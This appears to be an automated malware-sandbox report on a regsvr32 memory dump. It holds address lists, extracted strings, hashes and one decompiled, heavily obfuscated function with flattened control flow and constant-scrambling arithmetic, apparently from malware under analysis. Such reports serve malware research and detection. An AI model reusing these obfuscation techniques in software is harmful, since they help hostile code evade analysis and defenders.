0x003d5c37
0x003d5c3f
0x003d5c47
0x003d5c54
0x003d5c58
0x003d5c60
0x003d5c68
0x003d5c70
0x003d5c78
0x003d5c95
0x003d5c9a
0x003d5ca2
0x003d5ca4
0x003d5cac
0x003d5cb4
0x003d5cbc
0x003d5cc4
0x003d5cc9
0x003d5cce
0x003d5cd3
0x003d5cdb
0x003d5ce3
0x003d5ce8
0x003d5ced
0x003d5cf2
0x003d5cfa
0x003d5d07
0x003d5d0b
0x003d5d10
0x003d5d2d
0x003d5d32
0x003d5d3c
0x003d5d41
0x003d5d49
0x003d5d51
0x003d5d5d
0x003d5d61
0x003d5d69
0x003d5d71
0x003d5d79
0x003d5d81
0x003d5d89
0x003d5d91
0x003d5d99
0x003d5da1
0x003d5da9
0x003d5db1
0x003d5db9
0x003d5dc1
0x003d5dc9
0x003d5dd1
0x003d5dd6
0x003d5deb
0x003d5df6
0x003d5dfc
0x003d5e03
0x003d5e0b
0x003d5e10
0x003d5e1c
0x003d5e20
0x003d5e28
0x003d5e2d
0x003d5e39
0x003d5e41
0x003d5e45
0x003d5e4d
0x003d5e61
0x003d5e65
0x003d5e71
0x003d5e79
0x003d5e81
0x003d5e86
0x003d5e8e
0x003d5e96
0x003d5e9e
0x003d5ea6
0x003d5eae
0x003d5eb6
0x003d5ebe
0x003d5ec6
0x003d5ece
0x003d5ed6
0x003d5edb
0x003d5ee3
0x003d5eeb
0x003d5ef3
0x003d5efb
0x003d5f03
0x003d5f2f
0x003d5f34
0x003d5f3c
0x003d5f48
0x003d5f4b
0x003d5f53
0x003d5f58
0x003d5f60
0x003d5f68
0x003d5f6d
0x003d5f75
0x003d5f7d
0x003d5f8b
0x003d5f8f
0x003d5fa3
0x003d5fa8
0x003d5fb2
0x003d5fc3
0x003d5fc7
0x003d5fcf
0x003d5fd7
0x003d5fdf
0x003d5fe4
0x003d5fec
0x003d5ff4
0x003d5ffc
0x003d5ffc
0x003d5ffc
0x003d6010
0x003d6015
0x00000000
0x003d55d7
0x003d55d7
0x003d55d9
0x003d58b6
0x003d58c7
0x003d58c8
0x003d58d2
0x003d58d6
0x003d58de
0x003d58e6
0x003d58ee
0x003d58f6
0x003d58fe
0x003d5906
0x003d590e
0x003d5916
0x003d5920
0x003d5924
0x003d5929
0x003d593d
0x003d5946
0x003d594b
0x003d5953
0x003d5955
0x003d595f
0x003d596e
0x003d5972
0x003d597a
0x003d5982
0x003d5987
0x003d598c
0x003d5998
0x003d599c
0x003d59ae
0x003d59b2
0x003d59b7
0x003d59bf
0x003d59cb
0x003d59cf
0x003d59dc
0x003d59e0
0x003d59e8
0x003d59f0
0x003d59f8
0x003d5a00
0x003d5a08
0x003d5a18
0x003d5a1c
0x003d5a24
0x003d5a2c
0x003d5a34
0x003d5a3c
0x003d5a44
0x003d5a4c
0x003d5a54
0x003d5a5c
0x003d5a64
0x003d5a6c
0x003d5a74
0x003d5a7c
0x003d5a84
0x003d5a94
0x003d5a97
0x003d5a9f
0x003d5aa7
0x003d5aaf
0x003d5ab7
0x003d5abf
0x003d5ac4
0x003d5ac9
0x003d5ad1
0x003d5ad9
0x003d5ae1
0x003d5ae9
0x003d5af3
0x003d5afb
0x003d5b00
0x003d5b1f
0x003d5b29
0x003d5b43
0x003d5b48
0x003d5b4b
0x003d5b4d
0x003d5b56
0x003d5b4f
0x003d5b51
0x003d5b53
0x003d5b53
0x003d5b5b
0x003d5b65
0x003d5b6a
0x003d5b79
0x003d5b7c
0x003d5b80
0x003d5b88
0x003d5b96
0x003d5b97
0x003d5b9d
0x003d5ba1
0x003d5ba9
0x003d5bb8
0x003d5bbc
0x003d5bc4
0x003d5bd8
0x00000000
0x003d55df
0x003d55df
0x003d55e5
0x003d55eb
0x003d55f5
0x003d55fd
0x003d5602
0x003d560a
0x003d5612
0x003d561a
0x003d5622
0x003d562a
0x003d5632
0x003d563a
0x003d5642
0x003d5647
0x003d564f
0x003d565d
0x003d5660
0x003d5664
0x003d566c
0x003d5674
0x003d5691
0x003d5696
0x003d56a0
0x003d56b1
0x003d56b2
0x003d56b6
0x003d56be
0x003d56cc
0x003d56d0
0x003d56d8
0x003d56e0
0x003d56ed
0x003d56f1
0x003d56f9
0x003d5701
0x003d5709
0x003d570e
0x003d572b
0x003d5730
0x003d573a
0x003d5744
0x003d574c
0x003d5754
0x003d575c
0x003d5761
0x003d5765
0x003d576d
0x003d5775
0x003d5782
0x003d578e
0x003d5792
0x003d579a
0x003d57a2
0x003d57aa
0x003d57c8
0x003d57cd
0x003d57d5
0x003d57e1
0x003d57e4
0x003d57e9
0x003d57f3
0x003d57fb
0x003d5806
0x003d580a
0x003d580e
0x003d5816
0x003d581e
0x003d582b
0x003d582f
0x003d5843
0x003d5848
0x003d5850
0x003d5858
0x003d5860
0x003d5868
0x003d5870
0x003d5874
0x003d587c
0x003d5884
0x003d588c
0x003d5894
0x003d58a9
0x003d58ae
0x003d6018
0x003d6018
0x00000000
0x003d6018
0x003d55e5
0x003d55d9
0x003d6031
0x003d6031
0x00000000
0x003d603d

Strings

O1, xrefs: 003D5D79
O', xrefs: 003D593D
hp,;, xrefs: 003D5955
?, xrefs: 003D5AD9
%-@, xrefs: 003D5A44
M, xrefs: 003D53E7
V8, xrefs: 003D5C1B
M, xrefs: 003D602C
{, xrefs: 003D560A
GA]U, xrefs: 003D5EF3
jY, xrefs: 003D55F5
7, xrefs: 003D5EDB
M, xrefs: 003D5239
T, xrefs: 003D5DD6
o>0, xrefs: 003D5AD1

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: %-@$GA]U$O'$O1$T$V8$hp,;$jY$o>0${$7$?$M$M$M
API String ID: 0-3708952500
Opcode ID: 3340c615ddfecd66529de7ed8d60bdf88aa10d53c8ef4b4b73c1387e3a4cf5e8
Instruction ID: c2a85eee380c1e6ebbd68dfdbf98f1d11454bbb87e5f0abe0bbae076a372c4a0
Opcode Fuzzy Hash: 3340c615ddfecd66529de7ed8d60bdf88aa10d53c8ef4b4b73c1387e3a4cf5e8
Instruction Fuzzy Hash: 3282FBB11093419FC389CF61D58A80BFBE1BBD8748F508A1DF59696260D3B5CA49CF87

Uniqueness

Uniqueness Score: -1.00%

Function 003D0F87 Relevance: 18.2, Strings: 14, Instructions: 683
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E003D0F87(intOrPtr* __ecx) {
				char _v68;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr* _v88;
				char _v92;
				signed int _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				void* _t721;
				void* _t726;
				void* _t772;
				void* _t781;
				intOrPtr _t789;
				void* _t794;
				void* _t797;
				void* _t809;
				void* _t816;
				signed int _t817;
				signed int _t827;
				signed int _t830;
				signed int _t831;
				signed int _t833;
				signed int _t837;
				signed int _t838;
				signed int _t840;
				signed int _t842;
				signed int _t846;
				signed int _t852;
				signed int _t854;
				signed int _t856;
				signed int _t858;
				signed int _t860;
				void* _t869;
				intOrPtr* _t916;
				void* _t918;
				intOrPtr _t922;
				signed int* _t923;
				void* _t929;

				_t923 =  &_v140;
				_t916 = __ecx;
				_v84 = 0x52564;
				_t922 = 0;
				_v88 = __ecx;
				_t809 = 0xc08e2;
				_v80 = 0;
				_t918 = 0x7e821;
				_v96 = 0x76;
				while(1) {
					L1:
					_t816 = 0xcb6ac;
					while(1) {
						L2:
						while(1) {
							L3:
							_t721 = 0xd93b6;
							do {
								L4:
								_t929 = _t809 - 0xb4052;
								if(_t929 > 0) {
									if(_t809 == 0xc08e2) {
										_t809 = 0x9b72f;
										goto L32;
									} else {
										if(_t809 == _t816) {
											E003D51F0(_v92);
											_t809 = 0xb4052;
											_t922 =  !=  ? 1 : _t922;
											goto L1;
										} else {
											if(_t809 == _t721) {
												_v136 = 0xdef278;
												_v136 = _v136 | 0x8abb06b1;
												_v136 = _v136 / _v96;
												_t827 = 0x67;
												_v136 = _v136 * 0x2c;
												_v136 = _v136 ^ 0x33df61ac;
												_v132 = 0xf546a9;
												_v132 = _v132 << 2;
												_v132 = _v132 ^ 0xaa38db5d;
												_v132 = _v132 << 0xc;
												_v132 = _v132 ^ 0xdc15f89e;
												_v140 = 0xfee67f;
												_v140 = _v140 + 0xfffffd05;
												_v140 = _v140 ^ 0xde1a77a7;
												_v140 = _v140 / _t827;
												_v140 = _v140 ^ 0x0227cacb;
												E003C3D63(_v136, _v100, _v132, _v108, _v140,  &_v92);
												_v120 = 0xf7ae55;
												_v120 = _v120 ^ 0x5d048f2e;
												_t923 =  &(_t923[5]);
												_v120 = _v120 ^ 0x5df3217b;
												_t816 = 0xcb6ac;
												_t809 =  ==  ? 0xcb6ac : 0x32a32;
												goto L2;
											} else {
												if(_t809 == 0xe7aeb) {
													_v140 = 0xf17be3;
													_v140 = _v140 | 0xb1f4ea81;
													_v140 = _v140 + 0xffff9cad;
													_v140 = _v140 ^ 0x2db814ca;
													_v140 = _v140 ^ 0x9c4d8d5a;
													_v112 = _v140;
													_v128 = 0x3b8fea;
													_t858 = 0x63;
													_v128 = _v128 / _t858;
													_v128 = _v128 / _v96;
													_v128 = _v128 ^ 0x000c6e49;
													_v136 = 0xc8ac76;
													_v136 = _v136 * 0x3f;
													_v136 = _v136 >> 1;
													_v136 = _v136 >> 0xc;
													_v136 = _v136 ^ 0x0002aa37;
													_v132 = 0xd71357;
													_v132 = _v132 >> 7;
													_v132 = _v132 + 0xffffe8a3;
													_v132 = _v132 + 0xffffb9b1;
													_v132 = _v132 ^ 0x00079406;
													_v140 = 0x9b3493;
													_v140 = _v140 << 7;
													_v140 = _v140 * 0x1e;
													_v140 = _v140 + 0xffff6beb;
													_v140 = _v140 ^ 0x18119c1e;
													E003C7671(_v128,  &_v108, _v136, _t858, _v112, _v132, _v140, _v104);
													_t923 =  &(_t923[6]);
													_t869 = 0x938d0;
													_t816 = 0xcb6ac;
													_t809 =  ==  ? 0x938d0 : 0x53881;
													goto L3;
												} else {
													if(_t809 != 0xf9244) {
														goto L32;
													} else {
														_v132 = 0x73015f;
														_v132 = _v132 + 0xffff123e;
														_v132 = _v132 + 0x33e7;
														_v132 = _v132 ^ 0x0077a243;
														_v128 = 0x6c994f;
														_v128 = _v128 << 1;
														_v128 = _v128 | 0x2039ff10;
														_v128 = _v128 ^ 0x20fa0278;
														_v120 = 0xac6959;
														_v120 = _v120 + 0xffffc931;
														_v120 = _v120 ^ 0x00aa2638;
														_v140 = 0xe74d4a;
														_v140 = _v140 + 0x2c2a;
														_v140 = _v140 + 0x1ef8;
														_t860 = 0x22;
														_v140 = _v140 / _t860;
														_v140 = _v140 ^ 0x000db415;
														E003CD855(_v132, _v128, _v108, _v120, _v140);
														_t923 =  &(_t923[3]);
														_t809 = 0x53881;
														while(1) {
															L1:
															_t816 = 0xcb6ac;
															goto L2;
														}
													}
												}
											}
										}
									}
								} else {
									if(_t929 == 0) {
										_v132 = 0x225fc9;
										_v132 = _v132 << 8;
										_v132 = _v132 + 0xfffffef0;
										_v132 = _v132 + 0xffff4cd2;
										_v132 = _v132 ^ 0x22564a8e;
										_v120 = 0x5db9b;
										_t817 = 0x28;
										_v120 = _v120 / _t817;
										_v120 = _v120 ^ 0x000d9631;
										_v140 = 0xaf8025;
										_v140 = _v140 + 0xffff73d5;
										_v140 = _v140 >> 0x10;
										_v140 = _v140 | 0xcc408f7d;
										_v140 = _v140 ^ 0xcc4fa477;
										E003D8E42(_v92, _v132, _v120, _v140);
										_t809 = 0x32a32;
										while(1) {
											L1:
											_t816 = 0xcb6ac;
											goto L2;
										}
									} else {
										if(_t809 == 0x1dae7) {
											_v136 = 0x6ed236;
											_v136 = _v136 >> 0xd;
											_v136 = _v136 + 0xffffefdc;
											_v136 = _v136 ^ 0xfff9ee1e;
											_v132 = 0x9499f8;
											_v132 = _v132 + 0x7cd7;
											_v132 = _v132 >> 0xb;
											_v132 = _v132 >> 4;
											_v132 = _v132 ^ 0x000f9be8;
											_v128 = 0x2bc2c5;
											_v128 = _v128 + 0xffffe708;
											_v128 = _v128 * 0x1c;
											_v128 = _v128 ^ 0x04c5a818;
											_v140 = 0x70740e;
											_v140 = _v140 + 0xffffa9b7;
											_v140 = _v140 + 0x784d;
											_v140 = _v140 + 0xffff07c6;
											_v140 = _v140 ^ 0x006faeac;
											_t726 = E003CD933(_v136, _v132, 0x3c126c, _v128, _v140);
											_v124 = 0x534860;
											_v124 = _v124 + 0x6c29;
											_v124 = _v124 << 7;
											_v124 = _v124 ^ 0x29d8a5b2;
											_v136 = 0xa3ab45;
											_v136 = _v136 ^ 0xdeea3b11;
											_v136 = _v136 | 0xb13bf905;
											_v136 = _v136 ^ 0xff7f6ceb;
											_v132 = 0xfa52ea;
											_v132 = _v132 >> 0x10;
											_v132 = _v132 * 0x4c;
											_v132 = _v132 ^ 0x000fcb85;
											_v128 = 0x8f70a5;
											_v128 = _v128 + 0x8702;
											_v128 = _v128 << 1;
											_v128 = _v128 ^ 0x01100b6d;
											_v140 = 0xe6aa99;
											_v140 = _v140 ^ 0x57e4d8d0;
											_v140 = _v140 + 0xfffff632;
											_v140 = _v140 * 0x7a;
											_v140 = _v140 ^ 0x7729e329;
											_v116 = 0xe0cef4;
											_v116 = _v116 >> 0x10;
											_v116 = _v116 ^ 0x0004604d;
											_v120 = 0xd6c675;
											_v120 = _v120 | 0x6e3562bd;
											_v120 = _v120 ^ 0x6efd9657;
											E003D43E3( &_v100, _v124, _v136,  *((intOrPtr*)(_t916 + 4)), _v132, _v136,  *_t916, _v104, _v128, _t726, _v140, _v116, _v136, _v120);
											_v116 = 0xd64bfd;
											_t809 =  ==  ? 0xd93b6 : 0xf9244;
											_v116 = _v116 >> 8;
											_v116 = _v116 ^ 0x00009ecf;
											_v128 = 0xd40d32;
											_v128 = _v128 ^ 0x9b3369b3;
											_v128 = _v128 + 0xfe6e;
											_v128 = _v128 ^ 0x9bed4cb1;
											_v120 = 0x27a3a9;
											_v120 = _v120 >> 6;
											_v120 = _v120 ^ 0x0001351f;
											E003C43D3(_v116, _v128, _v120, _t726);
											_t923 =  &(_t923[0x11]);
											goto L18;
										} else {
											if(_t809 == 0x32a32) {
												_v140 = 0x4e7cad;
												_t830 = 0x60;
												_v140 = _v140 / _t830;
												_v140 = _v140 + 0xfffffeaa;
												_v140 = _v140 >> 1;
												_v140 = _v140 ^ 0x000cd6d1;
												_v124 = 0x5d6915;
												_v124 = _v124 + 0xe356;
												_v124 = _v124 + 0xffffb7a0;
												_v124 = _v124 + 0xffff6b64;
												_v124 = _v124 ^ 0x0050ff8d;
												_v136 = 0x591993;
												_v136 = _v136 >> 0xa;
												_v136 = _v136 << 3;
												_t831 = 0x21;
												_v136 = _v136 * 0x19;
												_v136 = _v136 ^ 0x0018e799;
												_v132 = 0x6dbbdf;
												_v132 = _v132 * 0x5d;
												_v132 = _v132 >> 0xe;
												_v132 = _v132 / _t831;
												_v132 = _v132 ^ 0x000b01f1;
												E003CD855(_v140, _v124, _v100, _v136, _v132);
												_t923 =  &(_t923[3]);
												_t809 = 0xf9244;
												while(1) {
													L1:
													_t816 = 0xcb6ac;
													goto L2;
												}
											} else {
												if(_t809 == 0x53881) {
													_v128 = 0x23c90;
													_t833 = 0x4b;
													_v128 = _v128 * 0x45;
													_v128 = _v128 * 0x27;
													_v128 = _v128 ^ 0x1788b49b;
													_v140 = 0x9ca5de;
													_v140 = _v140 * 0x32;
													_v140 = _v140 + 0xffff4513;
													_v140 = _v140 / _t833;
													_v140 = _v140 ^ 0x006cfbfa;
													E003D8B16(_v128, _v104, _t833, _v140);
												} else {
													if(_t809 == _t918) {
														_v124 = 0x168982;
														_t837 = 0x7a;
														_v124 = _v124 / _t837;
														_v124 = _v124 << 6;
														_t838 = 0x46;
														_v124 = _v124 * 0x28;
														_v124 = _v124 ^ 0x01d78d81;
														_v136 = 0x274639;
														_v136 = _v136 >> 6;
														_v136 = _v136 + 0xffff26a6;
														_v136 = _v136 / _t838;
														_v136 = _v136 ^ 0x03abaa35;
														_v140 = 0x57a0fb;
														_v140 = _v140 + 0x6d0;
														_v140 = _v140 ^ 0x0055770d;
														_v128 = 0xd5d917;
														_v128 = _v128 * 0x1a;
														_v128 = _v128 ^ 0x15b83077;
														_t772 = E003CD933(_v124, _v136, 0x3c126c, _v140, _v128);
														_v140 = 0xf48b1b;
														_t920 = _t772;
														_v140 = _v140 << 7;
														_v140 = _v140 + 0xffffc5cf;
														_v140 = _v140 ^ 0x7a455307;
														_v112 = _v140;
														_v120 = 0x2780a1;
														_t840 = 0x68;
														_v120 = _v120 * 0x54;
														_v120 = _v120 ^ 0x0cf92055;
														_v128 = 0xe75f4c;
														_v128 = _v128 << 9;
														_v128 = _v128 ^ 0x0b5a8ec7;
														_v128 = _v128 ^ 0xc5ea291c;
														_v132 = 0x2d31e;
														_v132 = _v132 ^ 0x17f04233;
														_v132 = _v132 * 0x25;
														_v132 = _v132 ^ 0x3ca3922a;
														_v132 = _v132 ^ 0x4aa6f04b;
														_v140 = 0xf966b3;
														_v140 = _v140 + 0xffff4b2e;
														_v140 = _v140 | 0x75a14de3;
														_v140 = _v140 ^ 0x75f4ee66;
														_v124 = 0x8363ba;
														_v124 = _v124 | 0x60e41a15;
														_v124 = _v124 >> 9;
														_v124 = _v124 * 0x54;
														_v124 = _v124 ^ 0x0fecd105;
														_v116 = 0xc61b5d;
														_v116 = _v116 + 0xe7d0;
														_v116 = _v116 ^ 0x00c40d01;
														_v136 = 0xe7ac86;
														_v136 = _v136 * 0x34;
														_v136 = _v136 / _t840;
														_v136 = _v136 ^ 0x4f5b6c5e;
														_v136 = _v136 ^ 0x4f2accec;
														_t781 = E003D66AF(_v120,  &_v76, _t840, _v112, _v108, _v128, _v132, _t772, _v140, _v124, _t840, _v116,  &_v112, _v136);
														_t923 =  &(_t923[0xf]);
														if(_t781 != 0) {
															_t809 = 0xf9244;
														} else {
															_v136 = 0x608c6c;
															_v136 = _v136 + 0xffff927e;
															_t846 = 0x5e;
															_v136 = _v136 / _t846;
															_v136 = _v136 << 8;
															_v136 = _v136 ^ 0x01026f51;
															_v140 = 0x19d148;
															_v140 = _v140 >> 6;
															_v140 = _v140 * 0x3d;
															_v140 = _v140 ^ 0x00131908;
															_v128 = 0x9fa4df;
															_v128 = _v128 | 0xb9f12d1c;
															_v128 = _v128 >> 2;
															_v128 = _v128 ^ 0x2e792dcc;
															_v132 = 0x7d5b47;
															_v132 = _v132 * 0x5d;
															_v132 = _v132 + 0x90d5;
															_v132 = _v132 + 0xffff3690;
															_v132 = _v132 ^ 0x2d8eafb7;
															_t789 =  *0x3e221c; // 0x0
															E003DF4FB(_v136,  &_v68, _v140, _t789 + 0xc, _v128, 0x40, _v132);
															_t923 =  &(_t923[5]);
															_t809 = 0x1dae7;
														}
														_v132 = 0x97710d;
														_v132 = _v132 << 3;
														_v132 = _v132 ^ 0xc89bdcc4;
														_v132 = _v132 + 0xf4b6;
														_v132 = _v132 ^ 0xcc2d217f;
														_v116 = 0xec2bf6;
														_v116 = _v116 << 0xf;
														_v116 = _v116 ^ 0x15f2019f;
														_v120 = 0x18d423;
														_t842 = 0x5e;
														_v120 = _v120 / _t842;
														_v120 = _v120 ^ 0x00039180;
														E003C43D3(_v132, _v116, _v120, _t920);
														goto L18;
													} else {
														if(_t809 == _t869) {
															_v136 = 0xc56112;
															_v136 = _v136 >> 7;
															_v136 = _v136 | 0x1b06c701;
															_v136 = _v136 + 0xffff8477;
															_v136 = _v136 ^ 0x1b0f17a8;
															_v140 = 0x4d7740;
															_v140 = _v140 + 0xffff08cd;
															_v140 = _v140 + 0xffffc582;
															_v140 = _v140 ^ 0x004b9a74;
															E003D6781(_v136, _v108, _t816, _v140);
															_t809 =  ==  ? _t918 : 0xf9244;
															while(1) {
																L1:
																_t816 = 0xcb6ac;
																L2:
																L3:
																_t721 = 0xd93b6;
																goto L4;
															}
														} else {
															if(_t809 == 0x9b72f) {
																_v140 = 0x9f3fd8;
																_v140 = _v140 >> 3;
																_v140 = _v140 ^ 0x001b26c2;
																_v128 = 0xb292af;
																_v128 = _v128 >> 0x10;
																_v128 = _v128 ^ 0x0007327c;
																_v136 = 0xa4270;
																_v136 = _v136 ^ 0xab2e38f1;
																_v136 = _v136 >> 1;
																_v136 = _v136 | 0xf4392cb9;
																_v136 = _v136 ^ 0xf5b80cc1;
																_v124 = 0x8371a5;
																_v124 = _v124 * 0x4c;
																_v124 = _v124 + 0xffff126a;
																_v124 = _v124 + 0x9eb5;
																_v124 = _v124 ^ 0x27059588;
																_t794 = E003CD933(_v140, _v128, 0x3c134c, _v136, _v124);
																_v124 = 0x3204ef;
																_v124 = _v124 + 0xffff7715;
																_v124 = _v124 + 0xffff0b2a;
																_v124 = _v124 + 0xffff1c06;
																_v124 = _v124 ^ 0x00208fff;
																_v136 = 0x43e0ae;
																_t852 = 0x4d;
																_v136 = _v136 / _t852;
																_v136 = _v136 | 0xa30668ec;
																_v136 = _v136 >> 0xe;
																_v136 = _v136 ^ 0x000ccaae;
																_v140 = 0x5b8dec;
																_v140 = _v140 + 0x37be;
																_v140 = _v140 ^ 0x005e0a42;
																_v128 = 0x1979df;
																_v128 = _v128 >> 9;
																_v128 = _v128 ^ 0x0006a783;
																_t797 = E003CD933(_v124, _v136, 0x3c121c, _v140, _v128);
																_v136 = 0xfa68cc;
																_v136 = _v136 * 0x5e;
																_v136 = _v136 ^ 0x5bfd1bd8;
																_v132 = 0xbc0320;
																_v132 = _v132 + 0xffff33da;
																_v132 = _v132 ^ 0x00bbf4e2;
																_v140 = 0xcafae9;
																_v140 = _v140 << 8;
																_v140 = _v140 ^ 0xcaf49705;
																_v128 = 0x665fc;
																_v128 = _v128 + 0xffffc64c;
																_v128 = _v128 ^ 0x0007fd4a;
																E003C22D2( &_v104, _v136, _t794, _v132, _v140, _t797, _v128);
																_v136 = 0xf67680;
																_t809 =  ==  ? 0xe7aeb : 0xa978;
																_v136 = _v136 ^ 0x92e300d7;
																_v136 = _v136 >> 7;
																_v136 = _v136 ^ 0x0120fc1d;
																_v132 = 0x4738ee;
																_v132 = _v132 ^ 0x9baf2d0f;
																_v132 = _v132 ^ 0x5312c883;
																_v132 = _v132 ^ 0xc8fce7cb;
																_v140 = 0xd41c34;
																_t854 = 0x12;
																_v140 = _v140 * 0x26;
																_v140 = _v140 / _t854;
																_v140 = _v140 ^ 0x01b9a7da;
																E003C43D3(_v136, _v132, _v140, _t794);
																_v136 = 0xf13e15;
																_v136 = _v136 << 7;
																_v136 = _v136 | 0xc5568e9f;
																_t856 = 0x74;
																_v136 = _v136 * 0x4c;
																_v136 = _v136 ^ 0x5e51b3d6;
																_v140 = 0xec644a;
																_t136 =  &_v140; // 0xec644a
																_v140 =  *_t136 / _t856;
																_v140 = _v140 << 1;
																_v140 = _v140 ^ 0x0005ab4e;
																_v128 = 0xace5f5;
																_v128 = _v128 + 0xffff6b98;
																_v128 = _v128 ^ 0x00a9680a;
																E003C43D3(_v136, _v140, _v128, _t797);
																_t916 = _v88;
																_t923 =  &(_t923[0x10]);
																L18:
																_t918 = 0x7e821;
																_t721 = 0xd93b6;
																_t816 = 0xcb6ac;
																_t869 = 0x938d0;
															}
															goto L32;
														}
													}
												}
											}
										}
									}
								}
								L35:
								return _t922;
								L32:
							} while (_t809 != 0xa978);
							goto L35;
						}
					}
				}
			}

0x003d0f87
0x003d0f91
0x003d0f93
0x003d0f9b
0x003d0f9d
0x003d0fa1
0x003d0fa6
0x003d0faa
0x003d0faf
0x003d0fb7
0x003d0fb7
0x003d0fb7
0x003d0fbc
0x003d0fbc
0x003d0fc1
0x003d0fc1
0x003d0fc1
0x003d0fc6
0x003d0fc6
0x003d0fc6
0x003d0fcc
0x003d19e9
0x003d1cb6
0x00000000
0x003d19ef
0x003d19f1
0x003d1c9f
0x003d1ca6
0x003d1cae
0x00000000
0x003d19f7
0x003d19f9
0x003d1bc8
0x003d1bd2
0x003d1be4
0x003d1bef
0x003d1bf0
0x003d1bf4
0x003d1bfc
0x003d1c04
0x003d1c09
0x003d1c11
0x003d1c16
0x003d1c1e
0x003d1c26
0x003d1c2e
0x003d1c3c
0x003d1c44
0x003d1c61
0x003d1c66
0x003d1c70
0x003d1c78
0x003d1c7b
0x003d1c8e
0x003d1c93
0x00000000
0x003d19ff
0x003d1a05
0x003d1ac0
0x003d1aca
0x003d1ad2
0x003d1ada
0x003d1ae2
0x003d1aee
0x003d1af2
0x003d1b00
0x003d1b05
0x003d1b15
0x003d1b19
0x003d1b21
0x003d1b2e
0x003d1b32
0x003d1b36
0x003d1b3b
0x003d1b43
0x003d1b4b
0x003d1b50
0x003d1b58
0x003d1b60
0x003d1b68
0x003d1b70
0x003d1b7a
0x003d1b7e
0x003d1b86
0x003d1ba7
0x003d1bac
0x003d1bb6
0x003d1bbb
0x003d1bc0
0x00000000
0x003d1a0b
0x003d1a11
0x00000000
0x003d1a17
0x003d1a17
0x003d1a21
0x003d1a29
0x003d1a31
0x003d1a39
0x003d1a41
0x003d1a45
0x003d1a4d
0x003d1a55
0x003d1a5d
0x003d1a65
0x003d1a6d
0x003d1a75
0x003d1a7d
0x003d1a8b
0x003d1a8e
0x003d1a92
0x003d1aae
0x003d1ab3
0x003d1ab6
0x003d0fb7
0x003d0fb7
0x003d0fb7
0x00000000
0x003d0fb7
0x003d0fb7
0x003d1a11
0x003d1a05
0x003d19f9
0x003d19f1
0x003d0fd2
0x003d0fd2
0x003d1959
0x003d1963
0x003d1968
0x003d1970
0x003d1978
0x003d1980
0x003d198e
0x003d1991
0x003d1995
0x003d199d
0x003d19a5
0x003d19ad
0x003d19b2
0x003d19ba
0x003d19d2
0x003d19d9
0x003d0fb7
0x003d0fb7
0x003d0fb7
0x00000000
0x003d0fb7
0x003d0fd8
0x003d0fde
0x003d1741
0x003d1749
0x003d174e
0x003d1756
0x003d175e
0x003d1766
0x003d176e
0x003d1773
0x003d1778
0x003d1780
0x003d1788
0x003d1795
0x003d1799
0x003d17a1
0x003d17a9
0x003d17b1
0x003d17b9
0x003d17c1
0x003d17de
0x003d17e3
0x003d17ed
0x003d17f8
0x003d17fd
0x003d1805
0x003d180d
0x003d1815
0x003d181d
0x003d1825
0x003d182d
0x003d1837
0x003d183b
0x003d1843
0x003d184b
0x003d1853
0x003d1857
0x003d185f
0x003d1867
0x003d186f
0x003d187c
0x003d1880
0x003d1888
0x003d1890
0x003d1895
0x003d189d
0x003d18a5
0x003d18ad
0x003d18e1
0x003d18e8
0x003d18fa
0x003d18fd
0x003d1902
0x003d190a
0x003d1912
0x003d191a
0x003d1922
0x003d192a
0x003d1932
0x003d1937
0x003d194c
0x003d1951
0x00000000
0x003d0fe4
0x003d0fea
0x003d1678
0x003d1688
0x003d168d
0x003d1693
0x003d169b
0x003d169f
0x003d16a7
0x003d16af
0x003d16b7
0x003d16bf
0x003d16c7
0x003d16cf
0x003d16d7
0x003d16dc
0x003d16e6
0x003d16e7
0x003d16eb
0x003d16f3
0x003d1700
0x003d1704
0x003d170f
0x003d1713
0x003d172f
0x003d1734
0x003d1737
0x003d0fb7
0x003d0fb7
0x003d0fb7
0x00000000
0x003d0fb7
0x003d0ff0
0x003d0ff6
0x003d1cc9
0x003d1cda
0x003d1cdb
0x003d1ce4
0x003d1ce8
0x003d1cf0
0x003d1cfd
0x003d1d01
0x003d1d0f
0x003d1d13
0x003d1d28
0x003d0ffc
0x003d0ffe
0x003d1334
0x003d1344
0x003d1349
0x003d134f
0x003d1359
0x003d135a
0x003d135e
0x003d1366
0x003d136e
0x003d1373
0x003d1381
0x003d1385
0x003d138d
0x003d1395
0x003d139d
0x003d13a5
0x003d13b2
0x003d13b6
0x003d13d3
0x003d13d8
0x003d13e0
0x003d13e2
0x003d13ea
0x003d13f4
0x003d1400
0x003d1404
0x003d1413
0x003d1414
0x003d1418
0x003d1420
0x003d1428
0x003d142d
0x003d1435
0x003d143d
0x003d1445
0x003d1452
0x003d1456
0x003d145e
0x003d1466
0x003d146e
0x003d1476
0x003d147e
0x003d1486
0x003d148e
0x003d1496
0x003d14a0
0x003d14a4
0x003d14ac
0x003d14b4
0x003d14bc
0x003d14c4
0x003d14d1
0x003d14db
0x003d14df
0x003d14e7
0x003d151f
0x003d1524
0x003d1529
0x003d15ed
0x003d152f
0x003d152f
0x003d1539
0x003d1547
0x003d154e
0x003d1552
0x003d1557
0x003d155f
0x003d1567
0x003d1571
0x003d1575
0x003d157d
0x003d1585
0x003d158d
0x003d1592
0x003d159a
0x003d15a7
0x003d15ab
0x003d15b3
0x003d15bb
0x003d15cd
0x003d15de
0x003d15e3
0x003d15e6
0x003d15e6
0x003d15f2
0x003d15fc
0x003d1601
0x003d1609
0x003d1611
0x003d1619
0x003d1621
0x003d1626
0x003d162e
0x003d163c
0x003d1640
0x003d1644
0x003d1658
0x00000000
0x003d1004
0x003d1006
0x003d12cc
0x003d12d4
0x003d12d9
0x003d12e1
0x003d12e9
0x003d12f1
0x003d12f9
0x003d1301
0x003d1309
0x003d131e
0x003d132c
0x003d0fb7
0x003d0fb7
0x003d0fb7
0x003d0fbc
0x003d0fc1
0x003d0fc1
0x00000000
0x003d0fc1
0x003d100c
0x003d1012
0x003d1018
